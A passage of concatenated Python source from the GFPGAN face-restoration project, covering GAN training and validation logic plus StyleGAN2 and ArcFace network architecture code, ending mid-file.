loss_dict['l_g_style'] = l_g_style # gan loss fake_g_pred = self.net_d(self.output) l_g_gan = self.cri_gan(fake_g_pred, True, is_disc=False) l_g_total += l_g_gan loss_dict['l_g_gan'] = l_g_gan # facial component loss if self.use_facial_disc: # left eye fake_left_eye, fake_left_eye_feats = self.net_d_left_eye(self.left_eyes, return_feats=True) l_g_gan = self.cri_component(fake_left_eye, True, is_disc=False) l_g_total += l_g_gan loss_dict['l_g_gan_left_eye'] = l_g_gan # right eye fake_right_eye, 
fake_right_eye_feats = self.net_d_right_eye(self.right_eyes, return_feats=True) l_g_gan = self.cri_component(fake_right_eye, True, is_disc=False) l_g_total += l_g_gan loss_dict['l_g_gan_right_eye'] = l_g_gan # mouth fake_mouth, fake_mouth_feats = self.net_d_mouth(self.mouths, return_feats=True) l_g_gan = self.cri_component(fake_mouth, True, is_disc=False) l_g_total += l_g_gan loss_dict['l_g_gan_mouth'] = l_g_gan if self.opt['train'].get('comp_style_weight', 0) > 0: # get gt feat _, real_left_eye_feats = self.net_d_left_eye(self.left_eyes_gt, return_feats=True) _, real_right_eye_feats = self.net_d_right_eye(self.right_eyes_gt, return_feats=True) _, real_mouth_feats = self.net_d_mouth(self.mouths_gt, return_feats=True) def _comp_style(feat, feat_gt, criterion): return criterion(self._gram_mat(feat[0]), self._gram_mat( feat_gt[0].detach())) * 0.5 + criterion( self._gram_mat(feat[1]), self._gram_mat(feat_gt[1].detach())) # facial component style loss comp_style_loss = 0 comp_style_loss += _comp_style(fake_left_eye_feats, real_left_eye_feats, self.cri_l1) comp_style_loss += _comp_style(fake_right_eye_feats, real_right_eye_feats, self.cri_l1) comp_style_loss += _comp_style(fake_mouth_feats, real_mouth_feats, self.cri_l1) comp_style_loss = comp_style_loss * self.opt['train']['comp_style_weight'] l_g_total += comp_style_loss loss_dict['l_g_comp_style_loss'] = comp_style_loss # identity loss if self.use_identity: identity_weight = self.opt['train']['identity_weight'] # get gray images and resize out_gray = self.gray_resize_for_identity(self.output) gt_gray = self.gray_resize_for_identity(self.gt) identity_gt = self.network_identity(gt_gray).detach() identity_out = self.network_identity(out_gray) l_identity = self.cri_l1(identity_out, identity_gt) * identity_weight l_g_total += l_identity loss_dict['l_identity'] = l_identity l_g_total.backward() self.optimizer_g.step() # EMA self.model_ema(decay=0.5**(32 / (10 * 1000))) # ----------- optimize net_d ----------- # for p in self.net_d.parameters(): p.requires_grad = True self.optimizer_d.zero_grad() if self.use_facial_disc: for p in self.net_d_left_eye.parameters(): p.requires_grad = True for p in self.net_d_right_eye.parameters(): p.requires_grad = True for p in self.net_d_mouth.parameters(): p.requires_grad = True self.optimizer_d_left_eye.zero_grad() self.optimizer_d_right_eye.zero_grad() self.optimizer_d_mouth.zero_grad() fake_d_pred = self.net_d(self.output.detach()) real_d_pred = self.net_d(self.gt) l_d = self.cri_gan(real_d_pred, True, is_disc=True) + self.cri_gan(fake_d_pred, False, is_disc=True) loss_dict['l_d'] = l_d # In WGAN, real_score should be positive and fake_score should be negative loss_dict['real_score'] = real_d_pred.detach().mean() loss_dict['fake_score'] = fake_d_pred.detach().mean() l_d.backward() # regularization loss if current_iter % self.net_d_reg_every == 0: self.gt.requires_grad = True real_pred = self.net_d(self.gt) l_d_r1 = r1_penalty(real_pred, self.gt) l_d_r1 = (self.r1_reg_weight / 2 * l_d_r1 * self.net_d_reg_every + 0 * real_pred[0]) loss_dict['l_d_r1'] = l_d_r1.detach().mean() l_d_r1.backward() self.optimizer_d.step() # optimize facial component discriminators if self.use_facial_disc: # left eye fake_d_pred, _ = self.net_d_left_eye(self.left_eyes.detach()) real_d_pred, _ = self.net_d_left_eye(self.left_eyes_gt) l_d_left_eye = self.cri_component( real_d_pred, True, is_disc=True) + self.cri_gan( fake_d_pred, False, is_disc=True) loss_dict['l_d_left_eye'] = l_d_left_eye l_d_left_eye.backward() # right eye fake_d_pred, 
_ = self.net_d_right_eye(self.right_eyes.detach()) real_d_pred, _ = self.net_d_right_eye(self.right_eyes_gt) l_d_right_eye = self.cri_component( real_d_pred, True, is_disc=True) + self.cri_gan( fake_d_pred, False, is_disc=True) loss_dict['l_d_right_eye'] = l_d_right_eye l_d_right_eye.backward() # mouth fake_d_pred, _ = self.net_d_mouth(self.mouths.detach()) real_d_pred, _ = self.net_d_mouth(self.mouths_gt) l_d_mouth = self.cri_component( real_d_pred, True, is_disc=True) + self.cri_gan( fake_d_pred, False, is_disc=True) loss_dict['l_d_mouth'] = l_d_mouth l_d_mouth.backward() self.optimizer_d_left_eye.step() self.optimizer_d_right_eye.step() self.optimizer_d_mouth.step() self.log_dict = self.reduce_loss_dict(loss_dict) def test(self): with torch.no_grad(): if hasattr(self, 'net_g_ema'): self.net_g_ema.eval() self.output, _ = self.net_g_ema(self.lq) else: logger = get_root_logger() logger.warning('Do not have self.net_g_ema, use self.net_g.') self.net_g.eval() self.output, _ = self.net_g(self.lq) self.net_g.train() def dist_validation(self, dataloader, current_iter, tb_logger, save_img): if self.opt['rank'] == 0: self.nondist_validation(dataloader, current_iter, tb_logger, save_img) def nondist_validation(self, dataloader, current_iter, tb_logger, save_img): dataset_name = dataloader.dataset.opt['name'] with_metrics = self.opt['val'].get('metrics') is not None use_pbar = self.opt['val'].get('pbar', False) if with_metrics: if not hasattr(self, 'metric_results'): # only execute in the first run self.metric_results = {metric: 0 for metric in self.opt['val']['metrics'].keys()} # initialize the best metric results for each dataset_name (supporting multiple validation datasets) self._initialize_best_metric_results(dataset_name) # zero self.metric_results self.metric_results = {metric: 0 for metric in self.metric_results} metric_data = dict() if use_pbar: pbar = tqdm(total=len(dataloader), unit='image') for idx, val_data in enumerate(dataloader): img_name = osp.splitext(osp.basename(val_data['lq_path'][0]))[0] self.feed_data(val_data) self.test() sr_img = tensor2img(self.output.detach().cpu(), min_max=(-1, 1)) metric_data['img'] = sr_img if hasattr(self, 'gt'): gt_img = tensor2img(self.gt.detach().cpu(), min_max=(-1, 1)) metric_data['img2'] = gt_img del self.gt # tentative for out of GPU memory del self.lq del self.output torch.cuda.empty_cache() if save_img: if self.opt['is_train']: save_img_path = osp.join(self.opt['path']['visualization'], img_name, f'{img_name}_{current_iter}.png') else: if self.opt['val']['suffix']: save_img_path = osp.join(self.opt['path']['visualization'], dataset_name, f'{img_name}_{self.opt["val"]["suffix"]}.png') else: save_img_path = osp.join(self.opt['path']['visualization'], dataset_name, f'{img_name}_{self.opt["name"]}.png') imwrite(sr_img, save_img_path) if with_metrics: # calculate metrics for name, opt_ in self.opt['val']['metrics'].items(): self.metric_results[name] += calculate_metric(metric_data, opt_) if use_pbar: pbar.update(1) pbar.set_description(f'Test {img_name}') if use_pbar: pbar.close() if with_metrics: for metric in self.metric_results.keys(): self.metric_results[metric] /= (idx + 1) # update the best metric result self._update_best_metric_result(dataset_name, metric, self.metric_results[metric], current_iter) self._log_validation_metric_values(current_iter, dataset_name, tb_logger) def _log_validation_metric_values(self, current_iter, dataset_name, tb_logger): log_str = f'Validation {dataset_name}\n' for metric, value in self.metric_results.items(): 
log_str += f'\t # {metric}: {value:.4f}' if hasattr(self, 'best_metric_results'): log_str += (f'\tBest: {self.best_metric_results[dataset_name][metric]["val"]:.4f} @ ' f'{self.best_metric_results[dataset_name][metric]["iter"]} iter') log_str += '\n' logger = get_root_logger() logger.info(log_str) if tb_logger: for metric, value in self.metric_results.items(): tb_logger.add_scalar(f'metrics/{dataset_name}/{metric}', value, current_iter) def save(self, epoch, current_iter): # save net_g and net_d self.save_network([self.net_g, self.net_g_ema], 'net_g', current_iter, param_key=['params', 'params_ema']) self.save_network(self.net_d, 'net_d', current_iter) # save component discriminators if self.use_facial_disc: self.save_network(self.net_d_left_eye, 'net_d_left_eye', current_iter) self.save_network(self.net_d_right_eye, 'net_d_right_eye', current_iter) self.save_network(self.net_d_mouth, 'net_d_mouth', current_iter) # save training state self.save_training_state(epoch, current_iter) File: gfpgan/models/__init__.py import importlib from basicsr.utils import scandir from os import path as osp # automatically scan and import model modules for registry # scan all the files that end with '_model.py' under the model folder model_folder = osp.dirname(osp.abspath(__file__)) model_filenames = [osp.splitext(osp.basename(v))[0] for v in scandir(model_folder) if v.endswith('_model.py')] # import all the model modules _model_modules = [importlib.import_module(f'gfpgan.models.{file_name}') for file_name in model_filenames] File: gfpgan/archs/stylegan2_bilinear_arch.py import math import random import torch from basicsr.ops.fused_act import FusedLeakyReLU, fused_leaky_relu from basicsr.utils.registry import ARCH_REGISTRY from torch import nn from torch.nn import functional as F class NormStyleCode(nn.Module): def forward(self, x): """Normalize the style codes. Args: x (Tensor): Style codes with shape (b, c). Returns: Tensor: Normalized tensor. """ return x * torch.rsqrt(torch.mean(x**2, dim=1, keepdim=True) + 1e-8) class EqualLinear(nn.Module): """Equalized Linear as StyleGAN2. Args: in_channels (int): Size of each sample. out_channels (int): Size of each output sample. bias (bool): If set to ``False``, the layer will not learn an additive bias. Default: ``True``. bias_init_val (float): Bias initialized value. Default: 0. lr_mul (float): Learning rate multiplier. Default: 1. activation (None | str): The activation after ``linear`` operation. Supported: 'fused_lrelu', None. Default: None. 
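
    Example:
        A small shape sketch with arbitrary layer sizes (the numbers are only
        illustrative):

        >>> import torch
        >>> linear = EqualLinear(512, 256)  # no activation
        >>> out = linear(torch.randn(4, 512))
        >>> out.shape
        torch.Size([4, 256])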
""" def __init__(self, in_channels, out_channels, bias=True, bias_init_val=0, lr_mul=1, activation=None): super(EqualLinear, self).__init__() self.in_channels = in_channels self.out_channels = out_channels self.lr_mul = lr_mul self.activation = activation if self.activation not in ['fused_lrelu', None]: raise ValueError(f'Wrong activation value in EqualLinear: {activation}' "Supported ones are: ['fused_lrelu', None].") self.scale = (1 / math.sqrt(in_channels)) * lr_mul self.weight = nn.Parameter(torch.randn(out_channels, in_channels).div_(lr_mul)) if bias: self.bias = nn.Parameter(torch.zeros(out_channels).fill_(bias_init_val)) else: self.register_parameter('bias', None) def forward(self, x): if self.bias is None: bias = None else: bias = self.bias * self.lr_mul if self.activation == 'fused_lrelu': out = F.linear(x, self.weight * self.scale) out = fused_leaky_relu(out, bias) else: out = F.linear(x, self.weight * self.scale, bias=bias) return out def __repr__(self): return (f'{self.__class__.__name__}(in_channels={self.in_channels}, ' f'out_channels={self.out_channels}, bias={self.bias is not None})') class ModulatedConv2d(nn.Module): """Modulated Conv2d used in StyleGAN2. There is no bias in ModulatedConv2d. Args: in_channels (int): Channel number of the input. out_channels (int): Channel number of the output. kernel_size (int): Size of the convolving kernel. num_style_feat (int): Channel number of style features. demodulate (bool): Whether to demodulate in the conv layer. Default: True. sample_mode (str | None): Indicating 'upsample', 'downsample' or None. Default: None. eps (float): A value added to the denominator for numerical stability. Default: 1e-8. """ def __init__(self, in_channels, out_channels, kernel_size, num_style_feat, demodulate=True, sample_mode=None, eps=1e-8, interpolation_mode='bilinear'): super(ModulatedConv2d, self).__init__() self.in_channels = in_channels self.out_channels = out_channels self.kernel_size = kernel_size self.demodulate = demodulate self.sample_mode = sample_mode self.eps = eps self.interpolation_mode = interpolation_mode if self.interpolation_mode == 'nearest': self.align_corners = None else: self.align_corners = False self.scale = 1 / math.sqrt(in_channels * kernel_size**2) # modulation inside each modulated conv self.modulation = EqualLinear( num_style_feat, in_channels, bias=True, bias_init_val=1, lr_mul=1, activation=None) self.weight = nn.Parameter(torch.randn(1, out_channels, in_channels, kernel_size, kernel_size)) self.padding = kernel_size // 2 def forward(self, x, style): """Forward function. Args: x (Tensor): Tensor with shape (b, c, h, w). style (Tensor): Tensor with shape (b, num_style_feat). Returns: Tensor: Modulated tensor after convolution. 
""" b, c, h, w = x.shape # c = c_in # weight modulation style = self.modulation(style).view(b, 1, c, 1, 1) # self.weight: (1, c_out, c_in, k, k); style: (b, 1, c, 1, 1) weight = self.scale * self.weight * style # (b, c_out, c_in, k, k) if self.demodulate: demod = torch.rsqrt(weight.pow(2).sum([2, 3, 4]) + self.eps) weight = weight * demod.view(b, self.out_channels, 1, 1, 1) weight = weight.view(b * self.out_channels, c, self.kernel_size, self.kernel_size) if self.sample_mode == 'upsample': x = F.interpolate(x, scale_factor=2, mode=self.interpolation_mode, align_corners=self.align_corners) elif self.sample_mode == 'downsample': x = F.interpolate(x, scale_factor=0.5, mode=self.interpolation_mode, align_corners=self.align_corners) b, c, h, w = x.shape x = x.view(1, b * c, h, w) # weight: (b*c_out, c_in, k, k), groups=b out = F.conv2d(x, weight, padding=self.padding, groups=b) out = out.view(b, self.out_channels, *out.shape[2:4]) return out def __repr__(self): return (f'{self.__class__.__name__}(in_channels={self.in_channels}, ' f'out_channels={self.out_channels}, ' f'kernel_size={self.kernel_size}, ' f'demodulate={self.demodulate}, sample_mode={self.sample_mode})') class StyleConv(nn.Module): """Style conv. Args: in_channels (int): Channel number of the input. out_channels (int): Channel number of the output. kernel_size (int): Size of the convolving kernel. num_style_feat (int): Channel number of style features. demodulate (bool): Whether demodulate in the conv layer. Default: True. sample_mode (str | None): Indicating 'upsample', 'downsample' or None. Default: None. """ def __init__(self, in_channels, out_channels, kernel_size, num_style_feat, demodulate=True, sample_mode=None, interpolation_mode='bilinear'): super(StyleConv, self).__init__() self.modulated_conv = ModulatedConv2d( in_channels, out_channels, kernel_size, num_style_feat, demodulate=demodulate, sample_mode=sample_mode, interpolation_mode=interpolation_mode) self.weight = nn.Parameter(torch.zeros(1)) # for noise injection self.activate = FusedLeakyReLU(out_channels) def forward(self, x, style, noise=None): # modulate out = self.modulated_conv(x, style) # noise injection if noise is None: b, _, h, w = out.shape noise = out.new_empty(b, 1, h, w).normal_() out = out + self.weight * noise # activation (with bias) out = self.activate(out) return out class ToRGB(nn.Module): """To RGB from features. Args: in_channels (int): Channel number of input. num_style_feat (int): Channel number of style features. upsample (bool): Whether to upsample. Default: True. """ def __init__(self, in_channels, num_style_feat, upsample=True, interpolation_mode='bilinear'): super(ToRGB, self).__init__() self.upsample = upsample self.interpolation_mode = interpolation_mode if self.interpolation_mode == 'nearest': self.align_corners = None else: self.align_corners = False self.modulated_conv = ModulatedConv2d( in_channels, 3, kernel_size=1, num_style_feat=num_style_feat, demodulate=False, sample_mode=None, interpolation_mode=interpolation_mode) self.bias = nn.Parameter(torch.zeros(1, 3, 1, 1)) def forward(self, x, style, skip=None): """Forward function. Args: x (Tensor): Feature tensor with shape (b, c, h, w). style (Tensor): Tensor with shape (b, num_style_feat). skip (Tensor): Base/skip tensor. Default: None. Returns: Tensor: RGB images. 
""" out = self.modulated_conv(x, style) out = out + self.bias if skip is not None: if self.upsample: skip = F.interpolate( skip, scale_factor=2, mode=self.interpolation_mode, align_corners=self.align_corners) out = out + skip return out class ConstantInput(nn.Module): """Constant input. Args: num_channel (int): Channel number of constant input. size (int): Spatial size of constant input. """ def __init__(self, num_channel, size): super(ConstantInput, self).__init__() self.weight = nn.Parameter(torch.randn(1, num_channel, size, size)) def forward(self, batch): out = self.weight.repeat(batch, 1, 1, 1) return out @ARCH_REGISTRY.register() class StyleGAN2GeneratorBilinear(nn.Module): """StyleGAN2 Generator. Args: out_size (int): The spatial size of outputs. num_style_feat (int): Channel number of style features. Default: 512. num_mlp (int): Layer number of MLP style layers. Default: 8. channel_multiplier (int): Channel multiplier for large networks of StyleGAN2. Default: 2. lr_mlp (float): Learning rate multiplier for mlp layers. Default: 0.01. narrow (float): Narrow ratio for channels. Default: 1.0. """ def __init__(self, out_size, num_style_feat=512, num_mlp=8, channel_multiplier=2, lr_mlp=0.01, narrow=1, interpolation_mode='bilinear'): super(StyleGAN2GeneratorBilinear, self).__init__() # Style MLP layers self.num_style_feat = num_style_feat style_mlp_layers = [NormStyleCode()] for i in range(num_mlp): style_mlp_layers.append( EqualLinear( num_style_feat, num_style_feat, bias=True, bias_init_val=0, lr_mul=lr_mlp, activation='fused_lrelu')) self.style_mlp = nn.Sequential(*style_mlp_layers) channels = { '4': int(512 * narrow), '8': int(512 * narrow), '16': int(512 * narrow), '32': int(512 * narrow), '64': int(256 * channel_multiplier * narrow), '128': int(128 * channel_multiplier * narrow), '256': int(64 * channel_multiplier * narrow), '512': int(32 * channel_multiplier * narrow), '1024': int(16 * channel_multiplier * narrow) } self.channels = channels self.constant_input = ConstantInput(channels['4'], size=4) self.style_conv1 = StyleConv( channels['4'], channels['4'], kernel_size=3, num_style_feat=num_style_feat, demodulate=True, sample_mode=None, interpolation_mode=interpolation_mode) self.to_rgb1 = ToRGB(channels['4'], num_style_feat, upsample=False, interpolation_mode=interpolation_mode) self.log_size = int(math.log(out_size, 2)) self.num_layers = (self.log_size - 2) * 2 + 1 self.num_latent = self.log_size * 2 - 2 self.style_convs = nn.ModuleList() self.to_rgbs = nn.ModuleList() self.noises = nn.Module() in_channels = channels['4'] # noise for layer_idx in range(self.num_layers): resolution = 2**((layer_idx + 5) // 2) shape = [1, 1, resolution, resolution] self.noises.register_buffer(f'noise{layer_idx}', torch.randn(*shape)) # style convs and to_rgbs for i in range(3, self.log_size + 1): out_channels = channels[f'{2**i}'] self.style_convs.append( StyleConv( in_channels, out_channels, kernel_size=3, num_style_feat=num_style_feat, demodulate=True, sample_mode='upsample', interpolation_mode=interpolation_mode)) self.style_convs.append( StyleConv( out_channels, out_channels, kernel_size=3, num_style_feat=num_style_feat, demodulate=True, sample_mode=None, interpolation_mode=interpolation_mode)) self.to_rgbs.append( ToRGB(out_channels, num_style_feat, upsample=True, interpolation_mode=interpolation_mode)) in_channels = out_channels def make_noise(self): """Make noise for noise injection.""" device = self.constant_input.weight.device noises = [torch.randn(1, 1, 4, 4, device=device)] for i in 
range(3, self.log_size + 1): for _ in range(2): noises.append(torch.randn(1, 1, 2**i, 2**i, device=device)) return noises def get_latent(self, x): return self.style_mlp(x) def mean_latent(self, num_latent): latent_in = torch.randn(num_latent, self.num_style_feat, device=self.constant_input.weight.device) latent = self.style_mlp(latent_in).mean(0, keepdim=True) return latent def forward(self, styles, input_is_latent=False, noise=None, randomize_noise=True, truncation=1, truncation_latent=None, inject_index=None, return_latents=False): """Forward function for StyleGAN2Generator. Args: styles (list[Tensor]): Sample codes of styles. input_is_latent (bool): Whether input is latent style. Default: False. noise (Tensor | None): Input noise or None. Default: None. randomize_noise (bool): Randomize noise, used when 'noise' is False. Default: True. truncation (float): TODO. Default: 1. truncation_latent (Tensor | None): TODO. Default: None. inject_index (int | None): The injection index for mixing noise. Default: None. return_latents (bool): Whether to return style latents. Default: False. """ # style codes -> latents with Style MLP layer if not input_is_latent: styles = [self.style_mlp(s) for s in styles] # noises if noise is None: if randomize_noise: noise = [None] * self.num_layers # for each style conv layer else: # use the stored noise noise = [getattr(self.noises, f'noise{i}') for i in range(self.num_layers)] # style truncation if truncation < 1: style_truncation = [] for style in styles: style_truncation.append(truncation_latent + truncation * (style - truncation_latent)) styles = style_truncation # get style latent with injection if len(styles) == 1: inject_index = self.num_latent if styles[0].ndim < 3: # repeat latent code for all the layers latent = styles[0].unsqueeze(1).repeat(1, inject_index, 1) else: # used for encoder with different latent code for each layer latent = styles[0] elif len(styles) == 2: # mixing noises if inject_index is None: inject_index = random.randint(1, self.num_latent - 1) latent1 = styles[0].unsqueeze(1).repeat(1, inject_index, 1) latent2 = styles[1].unsqueeze(1).repeat(1, self.num_latent - inject_index, 1) latent = torch.cat([latent1, latent2], 1) # main generation out = self.constant_input(latent.shape[0]) out = self.style_conv1(out, latent[:, 0], noise=noise[0]) skip = self.to_rgb1(out, latent[:, 1]) i = 1 for conv1, conv2, noise1, noise2, to_rgb in zip(self.style_convs[::2], self.style_convs[1::2], noise[1::2], noise[2::2], self.to_rgbs): out = conv1(out, latent[:, i], noise=noise1) out = conv2(out, latent[:, i + 1], noise=noise2) skip = to_rgb(out, latent[:, i + 2], skip) i += 2 image = skip if return_latents: return image, latent else: return image, None class ScaledLeakyReLU(nn.Module): """Scaled LeakyReLU. Args: negative_slope (float): Negative slope. Default: 0.2. """ def __init__(self, negative_slope=0.2): super(ScaledLeakyReLU, self).__init__() self.negative_slope = negative_slope def forward(self, x): out = F.leaky_relu(x, negative_slope=self.negative_slope) return out * math.sqrt(2) class EqualConv2d(nn.Module): """Equalized Linear as StyleGAN2. Args: in_channels (int): Channel number of the input. out_channels (int): Channel number of the output. kernel_size (int): Size of the convolving kernel. stride (int): Stride of the convolution. Default: 1 padding (int): Zero-padding added to both sides of the input. Default: 0. bias (bool): If ``True``, adds a learnable bias to the output. Default: ``True``. bias_init_val (float): Bias initialized value. 
Default: 0. """ def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, bias=True, bias_init_val=0): super(EqualConv2d, self).__init__() self.in_channels = in_channels self.out_channels = out_channels self.kernel_size = kernel_size self.stride = stride self.padding = padding self.scale = 1 / math.sqrt(in_channels * kernel_size**2) self.weight = nn.Parameter(torch.randn(out_channels, in_channels, kernel_size, kernel_size)) if bias: self.bias = nn.Parameter(torch.zeros(out_channels).fill_(bias_init_val)) else: self.register_parameter('bias', None) def forward(self, x): out = F.conv2d( x, self.weight * self.scale, bias=self.bias, stride=self.stride, padding=self.padding, ) return out def __repr__(self): return (f'{self.__class__.__name__}(in_channels={self.in_channels}, ' f'out_channels={self.out_channels}, ' f'kernel_size={self.kernel_size},' f' stride={self.stride}, padding={self.padding}, ' f'bias={self.bias is not None})') class ConvLayer(nn.Sequential): """Conv Layer used in StyleGAN2 Discriminator. Args: in_channels (int): Channel number of the input. out_channels (int): Channel number of the output. kernel_size (int): Kernel size. downsample (bool): Whether downsample by a factor of 2. Default: False. bias (bool): Whether with bias. Default: True. activate (bool): Whether use activateion. Default: True. """ def __init__(self, in_channels, out_channels, kernel_size, downsample=False, bias=True, activate=True, interpolation_mode='bilinear'): layers = [] self.interpolation_mode = interpolation_mode # downsample if downsample: if self.interpolation_mode == 'nearest': self.align_corners = None else: self.align_corners = False layers.append( torch.nn.Upsample(scale_factor=0.5, mode=interpolation_mode, align_corners=self.align_corners)) stride = 1 self.padding = kernel_size // 2 # conv layers.append( EqualConv2d( in_channels, out_channels, kernel_size, stride=stride, padding=self.padding, bias=bias and not activate)) # activation if activate: if bias: layers.append(FusedLeakyReLU(out_channels)) else: layers.append(ScaledLeakyReLU(0.2)) super(ConvLayer, self).__init__(*layers) class ResBlock(nn.Module): """Residual block used in StyleGAN2 Discriminator. Args: in_channels (int): Channel number of the input. out_channels (int): Channel number of the output. """ def __init__(self, in_channels, out_channels, interpolation_mode='bilinear'): super(ResBlock, self).__init__() self.conv1 = ConvLayer(in_channels, in_channels, 3, bias=True, activate=True) self.conv2 = ConvLayer( in_channels, out_channels, 3, downsample=True, interpolation_mode=interpolation_mode, bias=True, activate=True) self.skip = ConvLayer( in_channels, out_channels, 1, downsample=True, interpolation_mode=interpolation_mode, bias=False, activate=False) def forward(self, x): out = self.conv1(x) out = self.conv2(out) skip = self.skip(x) out = (out + skip) / math.sqrt(2) return out File: gfpgan/archs/arcface_arch.py import torch.nn as nn from basicsr.utils.registry import ARCH_REGISTRY def conv3x3(inplanes, outplanes, stride=1): """A simple wrapper for 3x3 convolution with padding. Args: inplanes (int): Channel number of inputs. outplanes (int): Channel number of outputs. stride (int): Stride in convolution. Default: 1. """ return nn.Conv2d(inplanes, outplanes, kernel_size=3, stride=stride, padding=1, bias=False) class BasicBlock(nn.Module): """Basic residual block used in the ResNetArcFace architecture. Args: inplanes (int): Channel number of inputs. planes (int): Channel number of outputs. 
stride (int): Stride in convolution. Default: 1. downsample (nn.Module): The downsample module. Default: None. """ expansion = 1 # output channel expansion ratio def __init__(self, inplanes, planes, stride=1, downsample=None): super(BasicBlock, self).__init__() self.conv1 = conv3x3(inplanes, planes, stride) self.bn1 = nn.BatchNorm2d(planes) self.relu = nn.ReLU(inplace=True) self.conv2 = conv3x3(planes, planes) self.bn2 = nn.BatchNorm2d(planes) self.downsample = downsample self.stride = stride def forward(self, x): residual = x out = self.conv1(x) out = self.bn1(out) out = self.relu(out) out = self.conv2(out) out = self.bn2(out) if self.downsample is not None: residual = self.downsample(x) out += residual out = self.relu(out) return out class IRBlock(nn.Module): """Improved residual block (IR Block) used in the ResNetArcFace architecture. Args: inplanes (int): Channel number of inputs. planes (int): Channel number of outputs. stride (int): Stride in convolution. Default: 1. downsample (nn.Module): The downsample module. Default: None. use_se (bool): Whether use the SEBlock (squeeze and excitation block). Default: True. """ expansion = 1 # output channel expansion ratio def __init__(self, inplanes, planes, stride=1, downsample=None, use_se=True): super(IRBlock, self).__init__() self.bn0 = nn.BatchNorm2d(inplanes) self.conv1 = conv3x3(inplanes, inplanes) self.bn1 = nn.BatchNorm2d(inplanes) self.prelu = nn.PReLU() self.conv2 = conv3x3(inplanes, planes, stride) self.bn2 = nn.BatchNorm2d(planes) self.downsample = downsample self.stride = stride self.use_se = use_se if self.use_se: self.se = SEBlock(planes) def forward(self, x): residual = x out = self.bn0(x) out = self.conv1(out) out = self.bn1(out) out = self.prelu(out) out = self.conv2(out) out = self.bn2(out) if self.use_se: out = self.se(out) if self.downsample is not None: residual = self.downsample(x) out += residual out = self.prelu(out) return out class Bottleneck(nn.Module): """Bottleneck block used in the ResNetArcFace architecture. Args: inplanes (int): Channel number of inputs. planes (int): Channel number of outputs. stride (int): Stride in convolution. Default: 1. downsample (nn.Module): The downsample module. Default: None. """ expansion = 4 # output channel expansion ratio def __init__(self, inplanes, planes, stride=1, downsample=None): super(Bottleneck, self).__init__() self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False) self.bn1 = nn.BatchNorm2d(planes) self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False) self.bn2 = nn.BatchNorm2d(planes) self.conv3 = nn.Conv2d(planes, planes * self.expansion, kernel_size=1, bias=False) self.bn3 = nn.BatchNorm2d(planes * self.expansion) self.relu = nn.ReLU(inplace=True) self.downsample = downsample self.stride = stride def forward(self, x): residual = x out = self.conv1(x) out = self.bn1(out) out = self.relu(out) out = self.conv2(out) out = self.bn2(out) out = self.relu(out) out = self.conv3(out) out = self.bn3(out) if self.downsample is not None: residual = self.downsample(x) out += residual out = self.relu(out) return out class SEBlock(nn.Module): """The squeeze-and-excitation block (SEBlock) used in the IRBlock. Args: channel (int): Channel number of inputs. reduction (int): Channel reduction ration. Default: 16. 
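
    Example:
        A shape sketch (the channel count is arbitrary); the block returns a
        tensor of the same shape with channel-wise re-weighting:

        >>> import torch
        >>> se = SEBlock(64, reduction=16)
        >>> out = se(torch.randn(2, 64, 16, 16))
        >>> out.shape
        torch.Size([2, 64, 16, 16])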
""" def __init__(self, channel, reduction=16): super(SEBlock, self).__init__() self.avg_pool = nn.AdaptiveAvgPool2d(1) # pool to 1x1 without spatial information self.fc = nn.Sequential( nn.Linear(channel, channel // reduction), nn.PReLU(), nn.Linear(channel // reduction, channel), nn.Sigmoid()) def forward(self, x): b, c, _, _ = x.size() y = self.avg_pool(x).view(b, c) y = self.fc(y).view(b, c, 1, 1) return x * y @ARCH_REGISTRY.register() class ResNetArcFace(nn.Module): """ArcFace with ResNet architectures. Ref: ArcFace: Additive Angular Margin Loss for Deep Face Recognition. Args: block (str): Block used in the ArcFace architecture. layers (tuple(int)): Block numbers in each layer. use_se (bool): Whether use the SEBlock (squeeze and excitation block). Default: True. """ def __init__(self, block, layers, use_se=True): if block == 'IRBlock': block = IRBlock self.inplanes = 64 self.use_se = use_se super(ResNetArcFace, self).__init__() self.conv1 = nn.Conv2d(1, 64, kernel_size=3, padding=1, bias=False) self.bn1 = nn.BatchNorm2d(64) self.prelu = nn.PReLU() self.maxpool = nn.MaxPool2d(kernel_size=2, stride=2) self.layer1 = self._make_layer(block, 64, layers[0]) self.layer2 = self._make_layer(block, 128, layers[1], stride=2) self.layer3 = self._make_layer(block, 256, layers[2], stride=2) self.layer4 = self._make_layer(block, 512, layers[3], stride=2) self.bn4 = nn.BatchNorm2d(512) self.dropout = nn.Dropout() self.fc5 = nn.Linear(512 * 8 * 8, 512) self.bn5 = nn.BatchNorm1d(512) # initialization for m in self.modules(): if isinstance(m, nn.Conv2d): nn.init.xavier_normal_(m.weight) elif isinstance(m, nn.BatchNorm2d) or isinstance(m, nn.BatchNorm1d): nn.init.constant_(m.weight, 1) nn.init.constant_(m.bias, 0) elif isinstance(m, nn.Linear): nn.init.xavier_normal_(m.weight) nn.init.constant_(m.bias, 0) def _make_layer(self, block, planes, num_blocks, stride=1): downsample = None if stride != 1 or self.inplanes != planes * block.expansion: downsample = nn.Sequential( nn.Conv2d(self.inplanes, planes * block.expansion, kernel_size=1, stride=stride, bias=False), nn.BatchNorm2d(planes * block.expansion), ) layers = [] layers.append(block(self.inplanes, planes, stride, downsample, use_se=self.use_se)) self.inplanes = planes for _ in range(1, num_blocks): layers.append(block(self.inplanes, planes, use_se=self.use_se)) return nn.Sequential(*layers) def forward(self, x): x = self.conv1(x) x = self.bn1(x) x = self.prelu(x) x = self.maxpool(x) x = self.layer1(x) x = self.layer2(x) x = self.layer3(x) x = self.layer4(x) x = self.bn4(x) x = self.dropout(x) x = x.view(x.size(0), -1) x = self.fc5(x) x = self.bn5(x) return x File: gfpgan/archs/stylegan2_clean_arch.py import math import random import torch from basicsr.archs.arch_util import default_init_weights from basicsr.utils.registry import ARCH_REGISTRY from torch import nn from torch.nn import functional as F class NormStyleCode(nn.Module): def forward(self, x): """Normalize the style codes. Args: x (Tensor): Style codes with shape (b, c). Returns: Tensor: Normalized tensor. """ return x * torch.rsqrt(torch.mean(x**2, dim=1, keepdim=True) + 1e-8) class ModulatedConv2d(nn.Module): """Modulated Conv2d used in StyleGAN2. There is no bias in ModulatedConv2d. Args: in_channels (int): Channel number of the input. out_channels (int): Channel number of the output. kernel_size (int): Size of the convolving kernel. num_style_feat (int): Channel number of style features. demodulate (bool): Whether to demodulate in the conv layer. Default: True. 
